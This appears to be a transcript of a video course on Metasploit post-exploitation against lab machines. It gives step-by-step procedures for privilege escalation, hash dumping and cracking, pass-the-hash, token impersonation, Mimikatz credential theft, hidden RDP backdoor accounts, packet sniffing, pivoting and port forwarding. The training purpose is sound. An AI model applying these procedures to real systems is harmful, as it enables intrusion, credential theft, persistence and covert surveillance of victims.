And sometimes, but not always, this information may help you. So let's come back to the actual point. I'm not going to go into and look for the individual patches. So the last place to look for local exploits on the system is by doing this manually or using Meterpreter local exploit suggester, and that might just do it for you. And all that information is here. Now it only needs a valid Meterpreter session, so we can run this command. And wait a couple of minutes to collect all the local exploits. Now these are the probable local exploits. Now I assume that you set up the lab, so I'll leave these for you to check. And please write in a comment section what you were faced with. Because right now I want to show you another thing. You shouldn't restrict yourself. So when you look on the internet for Windows local exploits, you're going to meet with some of the known exploits. And here's one of them, sysret. So visit the GitHub page. You can download it and examine it. So after the download, extract the files and go to the release folder. Now there are two files here which will perform exploitations for us. And I'm going to go back to the MSF console and navigate to the release folder from the console. Okay, so I'm already there. Now I'm here in the remote system also. So now you need to upload these files to the target, Metasploitable 3. So we can type upload-r, current directory, C, temp. R is for recursively uploading files in the folder. So it's going to install files to the temp folder in the C root directory. And by the way, don't forget to get the process ID. Mine is 5924. So, then type shell, and then we're going to change the directory to the temp folder and list the items here by dir for directory. The uploaded files will reside here. Now, to run the exploit, type sysret.exe -PID and your process ID. In my case, it's 5924, and it will quickly handle it. All right, so now hold Control-Z, right? Type Y, and this will send the channel to the background. Then look at who you are. I am NT Authority System. And now it's time to use Get System. Excellent. So you can see that you're finally able to get system-level access to the system from Meterpreter. So after successfully elevating privileges, what do? You can dump password hashes on the target system. So Meterpreter provides some commands and post modules that will help you to extract the username and password hashes from the system. To dump the Security Account Manager database, you will need to run as system to get around the registry restrictions and also dump the protected SAM storage that contains Windows usernames and passwords. But you already have elevated your privileges, so this is not a problem for you so far. Meterpreter has many ways to use for extracting hashes on the target system, the hash dump command, the hash dump script, and the post modules. And by the way, extraction is not limited to Windows machines. You can also extract Linux hashes. To do this, Meterpreter has the hash dump post modules. The problem here is, which one of them should you use? So let me tell you this. You can use them in order. So first start with the simplest one, hash dump. Just type hash dump to extract hashes from the target. And here are the hashes on Metasploitable 3. Then background the session, and let's look at the credentials stored in the Metasploit database. Creds. Okay, so there's no credential yet. This means that these hashes aren't added to the Metasploit database. So, you may ask about the credentials that you've gathered during other phases of this course. So I'll delete them to give a clear view to you now. Okay, interact with the session again. So the second option is the hash dump script, and this is a Meterpreter script. Now, somehow the hash dump command doesn't work. So let's try this. Run hash dump. And these are the hashes on Metasploitable 3. Send session in the background by using bg creds. And still there are no credentials added. So, Meterpreter again. And Metasploit also has post modules to gather hashes. One of these modules is the hash dump module. Yeah, the names are the same, because they both dump the hashes, right? So let's first look at the information about this module. It only needs a valid Meterpreter session. So now we can run this module. Run post Windows gather hash dump and hit enter. May take a few seconds. Okay, and the hashes are here. So let's have a quick look at the credential database. And sure enough, finally, the hashes are added to the Metasploit database. So now you can crack them with the built-in John the Ripper module. But don't let me get ahead of myself. I want to mention the other hash dumping module. First, interact with the session. Info, post, Windows, gather, smart hash dump. Well, this one has another name at least. So, when you look at the options of this module, there is a variable here named getSystem. So this module can try to get the system level access to extract the hashes if you directly set this variable. Or it will assume that it has the access already. So, let's run it without any option. Takes a little more time when you compare it to the others. But okay, great. The hashes do come. Now, you can try to crack these hashes. Send it to the background. Creds again. And here are the credentials that you gathered. So now let's get into the John the Ripper module. It's used to identify weak passwords that have been acquired as hashed files or raw landman NTLM hashes by using the hash dump command in Meterpreter. The goal of this module is to find trivial passwords in a short amount of time. To crack complex passwords or use large word lists, John the Ripper should be used outside of Metasploit. So search the term JTR, and let's use here the second module, JTR crack fast. So let's choose the module, use auxiliary, analyze, JTR, crack, fast. Show me the options, as always. Okay, so here there's nothing to configure, but there is a variable named use creds, which enables cracking the hashes in the creds table. So, okay, let's run the module. Now, it depends on hashes and the computation of your computer. It might take 2 or 3 minutes. Oh, it's already finished. So let me look at the creds table again. Excellent. The trivial hashes are hacked. Pass the hash is not a party game, nor is it a new attack. If you aren't new in this field, you've probably heard about it, a lot about it. It's ancient history. In fact, it dates back to 1997. But it is still valid for Windows operating systems. Actually, it doesn't like a classic vulnerability that I talked about earlier. But what do you want me to say? It just helps you authenticate a remote system with a hash. So when you use this method, you don't need to crack or decrypt the hash. I know what you're thinking. At first, it doesn't make sense that you can use a Windows hash for authentication remotely. So let me clarify what I'm saying here with an example. So let's assume that you've compromised a Windows machine by doing some fancy things and got an interpreter shell with a system or administrative privileges. And naturally, you're going to dump the SAM hashes by using hash dump. And I don't mean that you always gain access to a system through some exploits or by using Meterpreter. In fact, you may extract hashes with other methods like FG dump, PW dump, or cache dump, shoulder serve. Whatever way you accomplish it is fine. I remember once I even detached the hard drive of a client's machine to get the hashes. Okay, so now you have the username and hash pairs. So what is next? If you're lucky, but especially if you have the time, you may know how to use rainbow tables to crack the hashes. That doesn't seem unreasonable necessarily. But as I said before, and you'll hear me say it again, in a penetration test, time is a very important factor. So at this point, let's talk about you and me, right? The human being. Now, there are lots and lots of digital platforms out there. And I don't know about you, there's all kinds of even articles published about it. But lots of people use the exact same passwords for everything they have, everything they belong to, every device they own. So doesn't it make sense that they might share those credentials for their Windows authentication? Therefore, you don't need to crack the hash. And you'll use it to check if the other targets on the network use the same hash and user pair. Isn't there a tool for this? Yes, there is a PSExec tool that's developed by sysinternals, and this can check it for you. So you can use this tool to examine the network for which targets have the same user hash pair. It uses the Windows file and print sharing service, which operates over the protocol SMB to authenticate to other target hosts in the network. However, I think I even have a better solution. MSF, your Swiss Army knife, if you will, of hacking. You can use the MSF PSExec module. Now, one secret here that I want you to realize is this module, which is more stable than the sysinternals tool, also enables you to enter the password itself. So if you are able to obtain an NTLM password hash during your pen test, you can run the MSF PSExec module. So let's use it and see how it works. So let's go back to the MSF console, and let me choose the PSExec module. Use exploit, Windows SMB, PS exec, show me the options. All right, so now you must set some variables. Set rhost to 10.10.2.12 for my Windows 7 machine. Set rport to, all right, rport's already set. Set SMB user to Vagrant. Set SMB pass to Vagrant again. Okay, so you're allowed to use password hashes here, but you have cracked and got some clear text passwords too, right? So then set payload to Windows Meterpreter, reverse TCP, set lhost to your Kali IP address, set lport to 4445. So let's check one more time, show the options. Yeah, I don't think I missed anything. So let's exploit. So the module is quickly executed and the session is open. Look at the who am I on the target and bring the information about the target. And sure enough, we are on the Windows 7 machine. In token impersonation, you can grab a Kerberos token on the target's machine and then use it in the place of authentication to assume the identity of the user that originally created that token. Token impersonation is very beneficial for penetration tests and can be one of Meterpreter's most powerful features if you let it. So let's consider the following scenario. For example, if you are performing a penetration test and then you successfully compromise a system and establish a Meterpreter console, a domain administrator account has logged on within the last 10 hours to the compromised machine. So when this account logs on, a Kerberos token is passed to the server and is valid for a certain period of time. You exploit this system via the valid and active Kerberos token, and through Meterpreter you successfully assume the role of a domain administrator without needing the password. So then you hack a domain administrator account or go after a domain controller. This is probably one of the easiest ways to gain access into a system. And just another example of why Meterpreter is so useful. I almost made this not a family-friendly course. In MSF, you can accomplish this by using the Incognito extension. Incognito was originally a standalone application that allowed you to impersonate user tokens when successfully compromising a system. And it was so good that it was integrated into Metasploit as an extension to Meterpreter. So in order to load a Meterpreter extension, the load command is used. Type load L to list the available extensions for the current session. And you can use any of these extensions. So let's load Incognito. Okay, Incognito successfully loaded into my session. So every extension has its own commands. So does Incognito. You can type in help Incognito to view additional commands that will come with it. And also, every command has a help menu. So in the lab that we've set up, you're not going to have a domain, so I won't use the first 3 commands. Okay, so let's list tokens. And this is a help menu. And now I'm going to list tokens with the U parameter. Now, let's again look at who I am on the system to give you a clear idea. All right, so list tokens U. So in a nutshell, the tokens are acting just like web cookies. They're a temporary key that allows you to access the system and network without having to provide credentials every time you access a file. Incognito exploits this the same way cookie stealing works, by replaying that temporary key whenever asked to authenticate. Now, there are two types of tokens: delegate and impersonate. Delegate tokens are created for interactive logons, such as logging into the machine or connecting to it via remote desktop. Impersonate tokens are for non-interactive sessions, such as attaching a network drive or a domain logon script. So what are the other great things about tokens? Dude, they persist until a reboot. When a user logs off, their delegate token is reported as an impersonate token, but will still hold all the rights of a delegate token. So right now, I will impersonate the token of a Vagrant user. To do this, I'm going to use impersonate token as my command, impersonate token, and then paste the Vagrant user here. Don't forget to add a backslash here, and hit enter. And the message is positive, so check if it's true. Get UID. It is really true. You impersonate the Vagrant user. So, once you have an interpreter session, you can impersonate valid tokens on the system and become that specific user without ever having to worry about credentials, even hashes. So now you can continue with this user, or you can go back to your actual user. And then to do this, there's another command, rev to self. So just type rev to self, and then you are NT authority system again. Now, during a penetration test, this is especially useful since tokens have the possibility of allowing local and/or domain privilege escalation, enabling you alternate avenues with potentially elevated privileges to multiple systems, and that's what makes you a pro. So here's another great example of how Metasploit framework expands. When new tools arrive, they are rapidly integrated into the framework. Mimikatz is one of them, which is integrated into MSF like that. It was first written by Benjamin Delpy as a post-exploitation tool. Basically, it attempts to get users' clear text passwords from the memory over a interpreter session. Now, I know that you've already used the hashes by using the pass the hash attack. However, sometimes passwords can also be required to save time from the beginning. So that's when you can use the Mimikatz extension to get clear text passwords from the memory of the compromised target, leaving no trace on the disk. And there's one more thing to keep in mind. Mimikatz version 1 is implemented in MSF, but later on, when Mimikatz version 2 was released, it got implemented into the MSF and named Kiwi. So I'm going to start with load Mimikatz first, but for sure, you've got to have system privileges. And to list the extensions, type load L. And these are the available extensions to load on this session. Loading is a very easy process. Just type load and then the name of the extension. In this case, Mimikatz. Now it gives a warning about using Kiwi, but you can disregard it. So after you load Mimikatz, type help Mimikatz to list the commands of the extension. And with the Mimikatz command, you can directly run Mimikatz commands by themselves. Now I know this is a weird sentence, but it really will help you to execute all Mimikatz modules directly. But the other commands are like shortcuts of some Mimikatz modules. You'll get what I mean in a couple of seconds. So type Kerberos to get the clear text Kerberos credentials, and look at the password column. See how you get the clear text password? Now, it doesn't matter how strong the password is. And you can also list live SSP credentials by typing live SSP. If, of course, live SSP is applicable for the current operating system. But this time, you see password hashes in the password column. So it's also possible to get SSP credentials if they're available. So type TS package to view the TS package credentials. Now you can see clear text passwords on the last column. Now type wdigest to get clear passwords from the wdigest package. So if you're wondering what are all these TS package, wdigest, and all these others, they are all Microsoft security packages. So the implementations of these packages differ from OS to OS. And if you really want to know about these implementations, you can search for them on the World Wide Web, that thing that binds us all. But believe me, there's a lot to read. It's a very large topic. So for now, let's only get the passwords in clear text. Okay, then the Mimikatz command. This command enables you to run Mimikatz commands on the target directly. So first type help Mimikatz command. Whoops, hope you didn't see that. Then type Mimikatz command H to get the help menu. So Mimikatz has modules, and each module has different functions, and each function has its own parameters. So in order to list the modules, type Mimikatz command F, FU, and here are the Mimikatz modules. Mimikatz command F crypto will list the functions of the crypto module. List keys will give you a list of crypto keys in the memory. Now, we'll assume that you are in a server that has an SSL certificate. This will really help you to extract keys. List providers will bring the crypto providers, like you see right here. SecURL SA, that's another useful module. And if you read through this, these are the functions of this module. So the names are similar to the meterpreter commands of this extension. So MSV will bring only the password hashes. wdigest will generally bring the clear text passwords due to its implementation. And at the end of the line, there are the passwords. Kerberos is also an important function because it brings the passwords and Kerberos tickets if it's applicable for the current operating system. Then TS package is also very useful. It brings the credentials. So if live SSP and SSP are available, you can also get credentials of these packages by simply typing live SSP and SSP. So in my case here, there are no credentials provided by these packages. Now, it's also possible to get logged-in users' passwords from memory. So let's pass the logon passwords to Mimikatz command. Now you see, here are the password hashes for each user. Sometimes it brings it up like this. It might change due to the operating system. And then the last SecURL SA function is search passwords. So that's going to bring up all the clear text passwords from all the modules. Now here you might be seeing the same username a few times. because Mimikatz extracts each username password from different security packages DLL files. Now, the second extension is actually an upgraded version of Mimikatz. That's called Kiwi. So, load Kiwi. And now you're able to run the Kiwi commands. And in order to see the available Kiwi commands, type help Kiwi. And then the logic is exactly the same as Mimikatz. You can list Kerberos credentials by typing creds Kerberos. But this time, I think the view is better. So type in creds MSV to get MSV credentials. However, creds MSV sometimes can cause crashes on the target. It just randomly happens, but, just be prepared. And what do you know? As if I predict the future. So, because it's happened, I'm not going to panic. I will use my RC file to bring up a session again. Now, it takes a while to get a session again. But finally, I've got my new session. Okay. Then, use creds SSP for SSP credentials. Creds TS package, that's going to get me passwords from this DLL. But there's nothing really meaningful. Okay, creds WDigest, the situation's the same. So at the end, you extract some clear text passwords from the memory of the target. And now you can use these credentials to further compromise your target. Another feature of Meterpreter is the ability to capture the victim's desktop and save them on your system. So I'm already going to assume you have a Meterpreter console, and there are also a few commands. So let's have a look at what is on the victim screen. So let me first clear the screen, and we'll start with the first command. Screenshot is the basic command. Now you can only type screenshot, or with the P parameter, give a name to the image. Screenshot P, the path to the image. Now here is a screenshot that I saved. So let's go back to Meterpreter. And Meterpreter has an extension named ESPIA. So load SPIA, type help SPIA to view commands related to the SPIA extension. And for right now, only the screen grab command. So we'll type screen grab and then the path for the image. Now, if you don't add false to the parameter at the end, it will not try to open the saved image. Now, look at that. In my case, it won't open because I don't have the appropriate library. So let's go back to the folder that you save the screenshot in and open the image. And, whoa, okay, so I'm sorry, it doesn't work properly. I think it's because of some library issues. But thankfully, we do have in our back pocket some other modules to accomplish this. Meterpreter also has a script named ScreenSpy, which takes screenshots at various time intervals. It doesn't always work as it should, so I'm going to use the post module of this script. Now, display information about this module using the info command. And then run it. Run post, Windows, gather, screen spy. Whoops. Surely not port, so it must be post. Okay, so it'll take a few seconds to finish. Okay, module execution successfully completed. So go to MSF4 Loot to view the screenshots. I've opened the folder, and here are my screenshots. So let's open them to see if everything's okay. All right, everything looks good. And one more thing, I don't have a webcam to attach any of my virtual machines to. So that just means that I don't have the option to take a result from this command. But you may integrate a webcam and a microphone to test these functions. So go ahead and try that. Now, let's look at another situation where Metasploit makes it very easy to backdoor the system using nothing more than the built-in system tools. Now, it helps you to make a remote desktop connection to the target. Meterpreter has two options for this. First one is a Meterpreter script, get GUI, and you can utilize the get GUI script, which enables remote desktop and creates a user account for you to log in with. Pretty convenient. And then the other one is a reliable post module. Enable RDP. So now we'll have a look at how to use them. So I have a Meterpreter session on Metasploitable 3. And as you know, throughout the course, we have learned how to extract hashes and passwords. And now you have many credentials for Metasploitable 3. So you may want to make a remote desktop connection with one of these credentials. So that's what I'm going to do here. So let's open up a new tab. Now we'll use the Vagrant user and password. So R desktop, U Vagrant, P Vagrant, and the IP address of Metasploitable 3. Hit enter. And very good. You have a remote desktop connection on the target. But when I bring a target to my main screen, you can see that the actual user screen is locked. Not a very good thing, and it certainly isn't stealthy. And when this user on the target tries to log back in, my connection is going to be terminated, as you just saw there. So, how do we avoid this situation? The Meterpreter script and post module are the best solution. So we're going to first start with script. Run get GUI H gives some brief information about the script, but run get GUI without parameters to see the options. And the options are clean. So now let's run get GUI U pentest 1 P pentest 1 E. So the script enables RDP, arranges some firewall rules, and adds our user. And then adds this user to remote desktop users. And look at that, the script is executed successfully. So why don't we go to another tab, our desktop, U pentest 1, P pentest 1, 10.10.2.10. The RDP session is open. Now let's bring the target to the main screen. And look at that. See, the current user is still on the machine, and we can use it without being disturbed. And to verify the user, open the command prompt on Metasploitable 3. Type net users to view the users. And here is the pentest 1 user. Net user pentest 1 to get detailed information for pentest 1. Okay, so it's also in the RDP users group. Perfect. Now it's the post module's turn. So here we have the information about the Enable RDP Post module. Run Post, Windows, Manage, Enable RDP, username equals pentest2, password equals pentest2. So it does the same thing as the Get GUI script. Okay, so go to another tab, make an R desktop connection with pentest2. I'll just change the ones to 2s. So as you see, the current user on the target can still use the desktop. And to make it clear, open Windows command prompt, net users, and sure enough, pentest2 is on the list. And it's also in the RDP users group. And now you can interact with the user's desktop, look for critical files, and everything else that you want to do. Information leakage is one of the largest threats that corporations face, and much of it can be prevented by educating users to properly secure their data. Users being users, and more likely human, however, will frequently save data to their local workstations instead of on the corporate servers, where there's a whole lot greater control and security. Meterpreter happens to have a search function that will, by default, scour all drives of the compromised computer looking for files of your choosing. So besides this search command, there are also two other options. A Meterpreter script called File Collector, and a post module called enum files. All these options can help you download files from the target. And you can choose any of them according to your needs. So after you gain a Meterpreter shell on the machine, you can search for any file on the target. Now, surely you shouldn't just blindly search for anything. You can look for configuration files that contains passwords and keys, and etc., etc. Also, if you compromised an administrator machine, you can look for some additional network topology information, network configuration, etc., etc. But anyway, the search command is very simple. Type search F, and then the file name that you want to find, windows.ini. Okay, so the result has two files. If this is a standard text file, you can just view its contents. Cat C windows win.ini, and another query with the search command to look for a Tomcat users file. Search F, Tomcat users, and here are the results. Now you can also perform your search on a specific directory. All you need to do is just add the D parameter and then the folder name. D, C, manage engine. And then after you find what you're looking for, you already know that you can download this file using the download command. And that's it. I just downloaded the Tomcat users file. Okay, so here's the file in my local storage, so I can tend to that later. But I want to show you another option, and that's to use the File Collector script. And this is the help menu for the script. And the best feature of this script is that you can provide a list, and then it can search and then download that list. And the parameters are very clear. So I'm going to use the script with these parameters and hit enter. Now, I think the script is probably obsolete, so it doesn't work in my case. But the usage is like that, and you probably can run it in your environment. Now, you also have a post module that'll do what this script does. So let's look at it here. The information for enum files, post module. And it also has the same search command. For me, I prefer to use the search command, but it's always better to know alternatives. Okay, run post, Windows, gather, enum files, then file, globs, equals, tomcat.xml, to look for files like that, and search from C:\\/ to start the search from the C root directory of Windows. And then the search runs, and the post module also downloads the found files. So why don't we check the files? We'll copy the first file path, then go to the next tab. I typically use Sublime to open files, but you can use another text editor to open files, doesn't matter. Oh, look at that, nothing in this file. Okay, so I'll copy another one. Open it with Sublime. Ah, there we are, finally. You get some credentials. Meterpreter has the capability of packet sniffing the remote host without ever touching the hard disk. I'll tell you why it's especially useful, because you may want to monitor what type of information is being sent. The sniffer extension can store up to 200,000 packets in a ring buffer and exports them in standard PCAP format. So you can later process them using Wireshark or whatever you want. As an alternative to using the sniffer extension, there's a script, and that's called Packet Recorder. The script allows for more granularity when capturing packets. So not only can you sniff a particular interface, but any specified interface on the target. Why don't we have a look at that? So here I have a system level session on Metasploitable 3. Okay, so Sniffer is an extension for Meterpreter. And to be able to use it, I will load Sniffer onto the session. And you can view Sniffer commands by help Sniffer. Right, so there are 6 Sniffer commands available here. I think the names are pretty clear and self-explanatory. Don't think there's any need to explain each command, but I will quickly show you how to use them. So you must know the interfaces on the target to sniff, right? So Sniffer interfaces will list the interfaces on the target. And you might just get an error like this. And this is because of my session. It's a system level session, so I can't gather packets. In this situation, all you have to do is downgrade your session. So how do you do that? Type ps s explorer.exe to get the process ID of explorer.exe. And it's 5192. So now, migrate 5192. All right, migration was successful. So now, just list interfaces again. Sniffer interfaces. And here are the available interfaces detected on the target. Now the first column defines ID numbers for them. So we can then type sniffer start H. I think this message is enough to give us help. And now you can start sniffing. sniffer start, then 2 for the interface ID, and 30,000 for packet buffer, and sniffer has started. So now you need to create some traffic on Metasploitable 3. So what I'll do is I'll open it and just visit some pages on Metasploitable 2. And I think that's enough. So to dump the captured traffic, we first have to stop sniffing. So sniffer stop on the interface ID, and it looks like it stopped. So now we have 2 options right now. You can either dump the traffic or you can release the packets. So to dump, just use sniffer dump and the interface ID, and then the path that you want to save the file. Saved. Now open a new tab and go to that path. So now we're going to use Wireshark to view the PCAP file. I'm looking for login.php. Well, there it is. And then right-click on the packet and, well, we'll follow the TCP stream. And here's what I searched for. The username and password I entered. So what does that mean? It means that you captured the target's network traffic without even touching the system. So, for those of you out there who want another option, there is an interpreter script that's called Packet Recorder. So let's run Packet Recorder without any options, and that'll bring us our help menu. And the parameters are explained. Yeah, they're pretty good, I think. Now, this process has the exact same logic as before. So first, list the interfaces. Run Packet Recorder L. Same interfaces. To start recording, run Packet Recorder I. Interface to L, the directory to save the PCAP file. And the sniffing has begun. So now I'm going to go over to Metasploitable 3 to create some extra traffic. And that's plenty for now. So I'll go to another tab, go to the directory. So many folders. Okay, so you can open that file with Wireshark. All right, now you can examine the packets. For example, I'm going to choose this one and follow the stream. And here is the content of the pages that I visited. Pivoting is a kind of post-exploitation technique that allows you to move around different networks by using a compromised target. So you're going to access other networks that is reachable by the compromised target. Now, to understand how this works, I'll give you a simple example. So assume that you compromise a target on the network and you have an interpreter session open. And then you move on to collect internal information gathering on that target. Oh, what's that, you say? You used ipconfig or ifconfig, and there is a second network that your victim can reach, but you can't? That's when pivoting comes in particularly handy. So what you'll do is you'll use your compromised target to jump in the second network that you can't get to otherwise. So you'll use Meterpreter to add routes to reach a second network. The whole flow is called pivoting, and your first compromised machine is your pivot point. So here I already have a session on Metasploitable 3 using the psexec module. But before starting up, I think it's important to understand the logic. ifconfig. So this is my IP address, 10.10.2.16. And I have a session on the machine, 10.10.2.17, which is Metasploitable 3. So then, when I use my session on Metasploitable 3 to connect to 172.28.128.5, Windows 7, which is in another network that, well, I just can't reach, right? So when I ping 10.10.2.17, I can reach. When I ping 172.28.128.6, which is an other interface of Metasploitable 3, I can reach that too. But when I ping 172.28.128.5, which is Windows 7, I can't reach it, right? So I think that's pretty clear. So what I'm going to do is interact with my session. Let me check just once more who I am and where I am. It's always a good thing to know. All right, so I have the system-level Meterpreter shell on Metasploitable 3. So after gaining a Meterpreter shell, you have many things to do. And getting the network configuration of the target is one of the most important things you can do. So ipconfig or ifconfig, that'll bring up and display the basic IP information of the target. Now, when you look at these results carefully, you're going to find that the target has another interface, which has the IP address of 172.28.128.6. But you are not in that network. So in order to get more from your penetration test, you can also try to access that network. By the way, it is possible to use the Meterpreter get local subnets script, and it will also display the subnets of the target. Now, Meterpreter has a command named route, and as the helpful help menu suggests, it displays the route table of the target. But it not only displays it, but also you can add and delete and list this table. So route, without any parameter, displays all routes on Metasploitable 3. And you can get local subnets and the networks that are reached by the target from this result as well. So now that we have all the network information, we can go ahead and run Metasploit auto route as our post module to create a route to Windows 7 over Metasploitable 3. And here's the info command for auto route. So let's go ahead and use that. To view the routes, run post multi manage auto route with the parameter cmd equals print. And what this will do is print the route information if you've done it before. So there's no route. So the same command, but this time change the command value to add and then define the subnet value. So subnet equals 172.28.128.0. Hit enter. And the route is added. So let's print the route information again. And now you see you have a route to network 172.28.128.0 over Meterpreter session 1. So you're going step by step. So you can send this session to the background, or BG. And outside of the Meterpreter session, you can also observe the route information. But this route command belongs to Metasploit itself. So when you display the help menu, you can find the syntax of it. It's going to be a little different. And you can also add the route from here. Whichever way, it's up to you, but either way will work. So let's try to ping Windows 7 once more. No, denied. The result's the same. I can't reach it. So I'll go back. Now, because you have a route to the other network, you can discover the new targets by scanning for open ports and detecting services. So I'm first going to start with a simple SYN port scan. Use auxiliary scanner, port scan SYN. Show me the options. Set our hosts to 172.28.128.5 and 6. Now, because it is so slow, I'm not going to do this for the whole network. Set ports from 1 to 1,000 and set threads to 50. Show the options again. And yeah, everything seems okay. So let's run the module. And the execution of the module is slow due to routing issues. So I'll just pause the recording here and I'll come back to you in a second. All right, so we can stop execution at this point. Don't want to wait too much longer. And as you can see, port 445 is open on Windows 7. What does that mean? It means you can try to psexec to it with the credentials that you've already gathered from the beginning of the course. So, use exploit Windows SMB psexec. Show me the options. Set our host to Windows 7 IP. I don't think there's anything else to change. All right, so exploit seems good. Uh-oh, something went wrong. Show options. Aha, I found it. Did you? Have a look. It's the wrong payload. Now, because you can reach that network over a route, the network still can't connect back to us. So, you need to change the payload to a bind payload. Make sense? Set payload to Windows Meterpreter bind TCP. Show me the options. All right, so this time it's all okay to me. Then exploit. Perfectamundo. You get the session. Get UID, system level shell, sysinfo. Okay, you have a Meterpreter session on Windows 7. What time is it? It's time to dig into this target and infiltrate the network. Now, you may have heard about SSH port forwarding. If you have, you will be somewhat familiar with this section. However, the port forwarding technique used in Meterpreter is likely SSH port forwarding. So, this functionality will give you access to the ports on the target that you can't otherwise reach. So to understand how this works, I'll just indulge me a moment, will you? I'll tell you a little story. Think of a penetration test that you successfully compromise and gain access to a target. You with me so far? But you are not allowed to access port 3389 and 445, which can only be locally accessed for security reasons. So at this point, you need to forward these ports on the target to yourself. So, by using these port forwarding techniques in Meterpreter, you can reach a port on a target that you can't reach by any other way necessary. It just so happens the Meterpreter port forward command does all of this magic for us. And it's going to relay TCP connections to and from the connected machines. So I'm going to assume you already have an interpreter shell like I do here. I also have system level session on Metasploit 3 using WinRM as the exploit that you've discovered before. So, all right, same page, same page. So let me first check if I can reach port 445 after enabling Windows Firewall on Metasploit 3. So I'll open up a new tab, Nmap, P445, reason 10.10.2.10, and the port is filtered. So this will mean that the port is behind the firewall and it won't give us a response. So I'll go back to the interpreter session, type in shell as my command to get into the Windows shell. Now I want to check if port 445 is really closed or, well, whatever it's doing. So I'll type netstat no pipe find str 445. Now, as you see here, port 445 is listening on the local. Okay, so exit the shell. And now you discover that port 445 is open on the target, but you can't access it to make a PS exec or execute something else on that port. And that's why, thankfully, Interpreter port forward command will give us a hand. Port forward H. Help menu is awfully clear, so you can create port forwards and manage them. And I'm going to list if I have any. Port forward list. No, I don't have any. So it only takes a few seconds to add some. To add a port forward rule, type port forward, add. Then L for the local port on your system, and then P for the port on the target. And finally add R to specify the target IP address. And then you can add a rule. So now let's list it again. Alrighty then, you have a port forward rule. So you know this forward rule is even valid outside Metasploit. So let's go to another tab. And now I will make an Nmap scan. But this time I'm going to use my localhost IP, as well as the port that I bind remote, port 445, due to forwarding. So now the query will be Nmap P4445, reason 127.0.0.1, and I can see now port 4445 is open on my local host. Now, this doesn't really make sense, you know. So add SV to this query to identify the service information. And because of the forwarding is a little slow, okay, well, not that much. So have a look at that. Nmap detects a service on my local port 445 is a Microsoft service, which means the SMB service is running on that port. So I can go back to Metasploit, background the session. Now, the last step is making a PS exec to target over forwarding. So first let me choose PS exec, use exploit, Windows, SMB, PS exec, show me the options, set our host to 127.0.0.1, and it's the same logic for what we use for Nmap. So because I need to exploit the service running on port 445 on my local host, which forwards everything to port 445 on Metasploit 3. So set our port to 4445. Set SMB user to Vagrant, and SMB pass to Vagrant as well. Set payload to Windows, Meterpreter, reverse TCP, set lhost to the IP address of your collie, set lport to something that you want. Let's choose 5555. And I think I set up everything, but double checking is always better. So show the options again. And nothing extra to configure, so then I can exploit. I think that exploit is doing quite well. So at this point, sometimes sessions don't open, or sometimes 2 sessions open. So you can try it again, don't worry. And the session open by using the gorgeous duo, get UID, sysinfo, and you successfully make PS exec and have a session on Metasploitable 3. So I really want to show you how versatile Meterpreter scripting is. It has a scripting environment that allows you to write your own script or use the pre-written scripts by the community. And like the rest of the Metasploit framework, the scripts are written in Ruby and located in the main Metasploit directory in scripts/Meterpreter. Now, there's a wide variety of useful scripts that can help you to automate your workload in the Metasploit framework. The scripts that I'm going to mention are intended to be used with a Meterpreter shell after a successful compromise of a particular target. So once you have gained a session on the target, that's when you can use these scripts. However, the Metasploit team decided to convert these scripts to post-exploitation modules. Not every script has an equivalent post module, but most of them have. So let's have a look at what we have. So I've got a system-level shell on Metasploitable 3. So we're going to work on this session. So let's open up a new tab and go to Meterpreter Scripts folder, which is under the Metasploit Framework directory. ls lists of files here. So these are the Meterpreter scripts that are available when I recorded the course. All right, so let's have a look at one. Vim enum logged on users. Now here you see Ruby code. So it's possible to edit, or you can create a new one. It's up to you. I'm going to go back to my session, and I'm going to run this script that I viewed. So run enum logged on users. Without any options, it's going to display the help menu. Now this time I will add C and L for my parameters. And here come the results. Currently logged users and logged users. Okay. And almost every Meterpreter script has an equivalent post module. So enum logged on users has also one with the same name. And let's look at the information for this module. Info post Windows gather enum logged on users. So the scripts are good, but post modules are concurrent and they're more in the style of Metasploit. And you can set your variables here, but I'm not going to at this point. And you can run a script and a post module the same way. So you type run and then the name of the post module. And then hit enter. And the module will save the results to this path. So copy that path and open another tab. A file is already open, so quit Vim, and paste the path here. And you see that it saves only currently logged users. So you don't have to view this file, but some modules bring you an overwhelming amount of information. So let's quit Vim. Oh, and one last thing I want to show you. So I prepare a quick list of scripts that we've mostly used in the course, as well as their equivalent post modules. But some of them have no post modules and Meterpreter scripts. I just think it's really handy to use scripts for post exploitation. But at the end of the day, once you feel comfortable, feel free to use each one, however, will help you in whatever your needs are for your penetration testing. Metasploit and Meterpreter are both coded with, and they stand over Ruby. So even Metasploit lets you run directly any Ruby code on the target without any installation. However, the community widens this feature further. So Python and PowerShell extensions are a good example of how the community contributes to Metasploit. The Python extension gives you the ability to run Python code natively on a target machine without having the interpreter installed. Also, it lets you load your own Python scripts. And while Railgun gives us the ability to execute Win32 API calls, a completely in-memory Python interpreter is not a bad idea for Python lovers. It doesn't support all Python modules, but it is going to help you work with easy automation of Win32-related functions with libraries such as C-types. And besides, no one can underestimate the power of PowerShell. Now, it also comes as an extension to Meterpreter and can greatly expand Meterpreter's capability on a compromised Windows target. So in this coming section, we're going to touch on the features of these extensions, and I will show you how they can be used to your advantage. So with an active Meterpreter shell running on the target machine, let's type in load Python, and that's going to load the extension, giving us access to these new commands. And to get the new commands, just type in help Python. All right, so 3 new commands are added to the session. Python execute executes Python command strings directly. Python import helps you to import your Python files directly into memory. Python reset restarts the Python interpreter that loads into the memory. So why don't we start with the first one first? Typing Python execute H brings up the help menu. All right, so there's only one extra parameter. So let's type Python execute, and then type your Python code between double quotes. All right, so I'm going to get the path variable's value and assign it to the x variable. Then, with R, print the value of this variable. And yes, you just executed the first Python code on the target. So you ready for another example? Type Python execute. Now this time, let's get the path of the Tomcat user's file. And R to print the value of the variable. You can also import a file. So type Python import H to display the help menu. And here are a few more parameters. Python import F and the path to your file. Root desktop Tomcat users is my Python file. And this will look at all the paths on the target and print the Tomcat user's file path. Now, here's a place that you can really show your Python ability. So why don't we just jump into another extension, PowerShell. So type load PowerShell to load onto the session. Help PowerShell to view fresh commands. The first two commands work like Python commands that I already showed you, but the third one is different, so let's have a look. It's going to provide a PowerShell shell over the session. So that's really perfect to run the PowerShell commands. PowerShell execute H. So just one extra parameter, but you don't need it. Now this also depends on your PowerShell ability. So let's write some basic commands. To view the PowerShell version table, type PowerShell execute PS version table. Then PowerShell execute get service to list the services. And there are all the services listed below. So if you want to run a few commands with parameters, you have to use them between double quotes. So I'm only going to get the running services on the target with this line. And here it is, all running services. Ready for another example? So this time I will bring the 100 newest application logs with this line. Okay, I'll stop it here and let 